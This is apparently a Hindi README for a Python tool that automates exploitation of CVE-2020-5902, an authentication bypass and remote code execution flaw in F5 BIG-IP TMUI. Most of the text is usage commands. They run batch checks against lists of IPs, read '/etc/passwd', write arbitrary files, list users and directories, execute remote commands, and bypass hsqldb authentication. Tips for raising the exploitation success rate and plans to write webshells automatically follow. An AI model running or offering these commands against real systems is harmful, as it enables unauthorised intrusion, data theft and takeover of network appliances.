
F5 BIG-IP RCE CVE-2020-5902 स्वचालित जाँच उपकरण
20200706 को, ऑनलाइन F5 BIG-IP TMUI RCE भेद्यता उजागर हुई।
F5 BIG-IP के TMUI घटक (ट्रैफ़िक प्रबंधन उपयोगकर्ता इंटरफ़ेस) में प्रमाणीकरण बायपास भेद्यता है। यह भेद्यता Tomcat द्वारा पार्स किए गए URL और request.getPathInfo() के बीच अंतर के कारण उत्पन्न होती है, जिससे अनुमति सत्यापन को बायपास किया जा सकता है, TMUI मॉड्यूल के सभी कार्यों तक अनधिकृत पहुँच प्राप्त की जा सकती है, और फिर मनमानी फ़ाइलें पढ़ी/लिखी जा सकती हैं, कमांड निष्पादित किए जा सकते हैं, आदि।
विवरण के लिए देखें F5 BIG-IP TMUI RCE भेद्यता (CVE-2020-5902) पुनरुत्पादन और ध्यान देने योग्य बिंदु
यह उपकरण एकल IP जाँच, बैच IP जाँच, फ़ाइल पढ़ने/लिखने, प्रमाणित उपयोगकर्ताओं की सूची, निर्देशिका सूची, दूरस्थ कमांड निष्पादन और hsqldb प्रमाणीकरण बायपास जाँच का समर्थन करता है।
pip install requests
python f5-bigip-rce-cve-2020-5902.py -h

python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --check

python f5-bigip-rce-cve-2020-5902.py -f 1-2-f5.txt --check -t 20 -s 10

python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --fileread "/etc/passwd"

python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --filepath "/tmp/xxx.txt" --filecontent "x"

python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --list-users

python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --listdir "/tmp/"

python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --rce id --still-exploit

python f5-bigip-rce-cve-2020-5902.py -f 1-2-f5.txt --rce whoami --still-exploit -s 15 -t 20

python f5-bigip-rce-cve-2020-5902.py -u "https://1.2.3.4" --bypass-hsqldb

python f5-bigip-rce-cve-2020-5902.py -f 1-2-f5.txt --bypass-hsqldb

बैच IP के लिए शुरुआत में जहाँ तक संभव हो http:// या https:// जोड़ने का प्रयास करें। यदि कोई प्रोटोकॉल नहीं है, तो डिफ़ॉल्ट रूप से http:// जोड़ा जाएगा।
यदि स्थितियाँ अनुमति देती हैं, तो --still-exploit पैरामीटर जोड़ने की अनुशंसा की जाती है। भले ही list auth user विफल हो, rce को निष्पादित करने से सफलता दर बढ़ जाती है।
बैच सफलता दर बढ़ाने के लिए कई अनुरोध भेजना, दक्षता और प्रदर्शन के बीच संतुलन बनाना आवश्यक है।
hsqldb इंटरफ़ेस के डिसीरियलाइज़ेशन शोषण को एकीकृत करना।
स्वचालित रूप से webshell लिखने की क्षमता जोड़ना।
issus
lsablog
gmail:[email protected]
qq:[email protected]